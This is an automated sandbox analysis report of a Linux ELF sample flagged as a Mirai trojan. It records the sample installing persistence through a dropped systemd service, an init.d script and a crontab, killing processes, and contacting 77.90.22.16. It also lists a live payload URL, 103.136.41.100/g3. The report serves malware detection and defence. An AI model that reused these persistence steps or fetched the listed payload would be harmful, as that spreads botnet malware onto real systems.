Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
g3.elf

Overview

General Information

Sample name:g3.elf
Analysis ID:1589787
MD5:336affcc13d41caea92f7c85e5179859
SHA1:32447c6af6b556692e07bf9beffe8735ce65bbc4
SHA256:6a838a52943218de23020485f7401948a0c403a266d6b2a2ff1828b938544966
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to kill multiple processes (SIGKILL)
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads system information from the proc file system
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1589787
Start date and time:2025-01-13 06:57:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 54s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:g3.elf
Detection:MAL
Classification:mal64.spre.troj.evad.linELF@0/6@0/0
  • VT rate limit hit for: http://103.136.41.100/g3
Command:/tmp/g3.elf
PID:5491
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
gosh that chinese family at the other table sure ate a lot
Standard Error:
  • system is lnxubuntu20
  • g3.elf (PID: 5491, Parent: 5414, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/g3.elf
    • g3.elf New Fork (PID: 5508, Parent: 5491)
    • sh (PID: 5508, Parent: 5491, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 5514, Parent: 5508)
      • systemctl (PID: 5514, Parent: 5508, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • g3.elf New Fork (PID: 5518, Parent: 5491)
    • sh (PID: 5518, Parent: 5491, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 5523, Parent: 5518)
      • systemctl (PID: 5523, Parent: 5518, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
    • g3.elf New Fork (PID: 5524, Parent: 5491)
    • sh (PID: 5524, Parent: 5491, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
      • sh New Fork (PID: 5526, Parent: 5524)
      • crontab (PID: 5526, Parent: 5524, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab /tmp/crontab.tmp
    • g3.elf New Fork (PID: 5527, Parent: 5491)
    • sh (PID: 5527, Parent: 5491, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/etc/init.d/hello > /dev/null 2>&1"
      • sh New Fork (PID: 5529, Parent: 5527)
    • g3.elf New Fork (PID: 5531, Parent: 5491)
      • g3.elf New Fork (PID: 5533, Parent: 5531)
        • g3.elf New Fork (PID: 5535, Parent: 5533)
        • g3.elf New Fork (PID: 5537, Parent: 5533)
        • g3.elf New Fork (PID: 5538, Parent: 5533)
  • wrapper-2.0 (PID: 5499, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5500, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5501, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5502, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 5503, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5504, Parent: 3172, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 5516, Parent: 5515)
  • snapd-env-generator (PID: 5516, Parent: 5515, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: g3.elfReversingLabs: Detection: 26%
Source: global trafficTCP traffic: 192.168.2.14:53180 -> 77.90.22.16:5625
Source: global trafficTCP traffic: 192.168.2.14:44401 -> 1.1.1.1:53
Source: /tmp/g3.elf (PID: 5491)Socket: 127.0.0.1:23476Jump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: unknownTCP traffic detected without corresponding DNS query: 77.90.22.16
Source: g3.elfString found in binary or memory: http://%d.%d.%d.%d/%s
Source: g3.elf, 5491.1.00007fc708033000.00007fc708039000.rw-.sdmp, g3.elf, 5531.1.00007fc708033000.00007fc708039000.rw-.sdmpString found in binary or memory: http://1/wget.sh
Source: tmp.n9yUM3.38.dr, hello.service.12.dr, hello.12.dr, crontab.tmp.12.drString found in binary or memory: http://103.136.41.100/g3
Source: g3.elf, 5491.1.00007fc708033000.00007fc708039000.rw-.sdmp, g3.elf, 5531.1.00007fc708033000.00007fc708039000.rw-.sdmpString found in binary or memory: http://9/curl.sh
Source: g3.elf, 5491.1.00007fc708033000.00007fc708039000.rw-.sdmp, g3.elf, 5531.1.00007fc708033000.00007fc708039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: g3.elf, 5491.1.00007fc708033000.00007fc708039000.rw-.sdmp, g3.elf, 5531.1.00007fc708033000.00007fc708039000.rw-.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

barindex
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3129, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3184, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3187, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3188, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3189, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3190, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3193, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3207, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3215, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5499, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5500, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5501, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5502, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5503, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5504, result: successfulJump to behavior
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3129, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3184, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3187, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3188, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3189, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3190, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3193, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3207, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 3215, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5499, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5500, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5501, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5502, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5503, result: successfulJump to behavior
Source: /tmp/g3.elf (PID: 5491)SIGKILL sent: pid: 5504, result: successfulJump to behavior
Source: classification engineClassification label: mal64.spre.troj.evad.linELF@0/6@0/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5526)Crontab executable: /usr/bin/crontab -> crontab /tmp/crontab.tmpJump to behavior
Source: /usr/bin/crontab (PID: 5526)File: /var/spool/cron/crontabs/tmp.n9yUM3Jump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3244/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3244/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3244/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3244/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3244/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3120/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3120/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3120/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3120/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3120/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3120/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3361/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3361/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3361/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3361/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3361/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3239/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3239/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3239/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3239/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3239/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1577/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1577/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1577/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1577/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1577/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1610/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1610/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1610/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1610/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1610/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1299/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1299/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1299/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1299/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1299/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3235/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3235/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3235/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3235/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3235/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/2946/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/2946/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/2946/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/2946/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/2946/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3134/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1593/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1593/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1593/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1593/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1593/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3011/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3011/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3011/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3011/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3011/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3094/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3094/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3094/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3094/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3094/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/2955/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/2955/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/2955/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/2955/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/2955/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3406/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3406/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3406/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3406/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3406/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1589/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1589/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1589/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1589/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1589/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3402/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3402/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3402/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3402/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3402/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3125/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3125/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3125/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3125/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5491)File opened: /proc/3125/cmdlineJump to behavior
Source: /tmp/g3.elf (PID: 5508)Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"Jump to behavior
Source: /tmp/g3.elf (PID: 5518)Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"Jump to behavior
Source: /tmp/g3.elf (PID: 5524)Shell command executed: sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"Jump to behavior
Source: /tmp/g3.elf (PID: 5527)Shell command executed: sh -c "/etc/init.d/hello > /dev/null 2>&1"Jump to behavior
Source: /bin/sh (PID: 5514)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 5523)Systemctl executable: /usr/bin/systemctl -> systemctl start hello.serviceJump to behavior
Source: /tmp/g3.elf (PID: 5491)Reads from proc file: /proc/statJump to behavior
Source: /tmp/g3.elf (PID: 5491)Writes shell script file to disk with an unusual file extension: /etc/init.d/helloJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/g3.elf (PID: 5491)File: /etc/init.d/helloJump to dropped file
Source: /tmp/g3.elf (PID: 5491)Queries kernel information via 'uname': Jump to behavior
Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 5499)Queries kernel information via 'uname': Jump to behavior
Source: g3.elf, 5491.1.00007ffeb465e000.00007ffeb467f000.rw-.sdmp, g3.elf, 5531.1.00007ffeb465e000.00007ffeb467f000.rw-.sdmpBinary or memory string: ybx86_64/usr/bin/qemu-arm/tmp/g3.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/g3.elf
Source: g3.elf, 5491.1.00007ffeb465e000.00007ffeb467f000.rw-.sdmpBinary or memory string: /tmp/qemu-open.0fOSXo
Source: g3.elf, 5491.1.00007ffeb465e000.00007ffeb467f000.rw-.sdmpBinary or memory string: -V/tmp/qemu-open.0fOSXo:5
Source: g3.elf, 5491.1.0000562da3a29000.0000562da3b7a000.rw-.sdmp, g3.elf, 5531.1.0000562da3a29000.0000562da3b7a000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: g3.elf, 5491.1.00007ffeb465e000.00007ffeb467f000.rw-.sdmp, g3.elf, 5531.1.00007ffeb465e000.00007ffeb467f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: g3.elf, 5491.1.0000562da3a29000.0000562da3b7a000.rw-.sdmp, g3.elf, 5531.1.0000562da3a29000.0000562da3b7a000.rw-.sdmpBinary or memory string: -V!/etc/qemu-binfmt/arm
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts1
Scheduled Task/Job
1
Systemd Service
1
Systemd Service
1
Masquerading
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network Medium1
Service Stop
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
RootkitLSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589787 Sample: g3.elf Startdate: 13/01/2025 Architecture: LINUX Score: 64 51 1.1.1.1, 44401, 53 CLOUDFLARENETUS Australia 2->51 53 77.90.22.16, 53180, 53182, 53184 ASGHOSTNETDE Germany 2->53 55 Multi AV Scanner detection for submitted file 2->55 9 g3.elf 2->9         started        13 xfce4-panel wrapper-2.0 2->13         started        15 xfce4-panel wrapper-2.0 2->15         started        17 5 other processes 2->17 signatures3 process4 file5 45 /tmp/crontab.tmp, troff 9->45 dropped 47 /etc/init.d/hello, Bourne-Again 9->47 dropped 57 Sample tries to kill multiple processes (SIGKILL) 9->57 59 Drops files in suspicious directories 9->59 19 g3.elf sh 9->19         started        21 g3.elf sh 9->21         started        23 g3.elf sh 9->23         started        25 2 other processes 9->25 signatures6 process7 process8 27 sh crontab 19->27         started        31 sh systemctl 21->31         started        33 sh systemctl 23->33         started        35 g3.elf 25->35         started        37 sh 25->37         started        file9 49 /var/spool/cron/crontabs/tmp.n9yUM3, troff 27->49 dropped 61 Sample tries to persist itself using cron 27->61 63 Executes the "crontab" command typically for achieving persistence 27->63 39 g3.elf 35->39         started        41 g3.elf 35->41         started        43 g3.elf 35->43         started        signatures10 process11

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
g3.elf26%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/g3100%Avira URL Cloudmalware
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://%d.%d.%d.%d/%sg3.elffalse
    high
    http://1/wget.shg3.elf, 5491.1.00007fc708033000.00007fc708039000.rw-.sdmp, g3.elf, 5531.1.00007fc708033000.00007fc708039000.rw-.sdmpfalse
      high
      http://103.136.41.100/g3tmp.n9yUM3.38.dr, hello.service.12.dr, hello.12.dr, crontab.tmp.12.drfalse
      • Avira URL Cloud: malware
      unknown
      http://schemas.xmlsoap.org/soap/encoding/g3.elf, 5491.1.00007fc708033000.00007fc708039000.rw-.sdmp, g3.elf, 5531.1.00007fc708033000.00007fc708039000.rw-.sdmpfalse
        high
        http://9/curl.shg3.elf, 5491.1.00007fc708033000.00007fc708039000.rw-.sdmp, g3.elf, 5531.1.00007fc708033000.00007fc708039000.rw-.sdmpfalse
          high
          http://schemas.xmlsoap.org/soap/envelope/g3.elf, 5491.1.00007fc708033000.00007fc708039000.rw-.sdmp, g3.elf, 5531.1.00007fc708033000.00007fc708039000.rw-.sdmpfalse
            high
            • No. of IPs < 25%
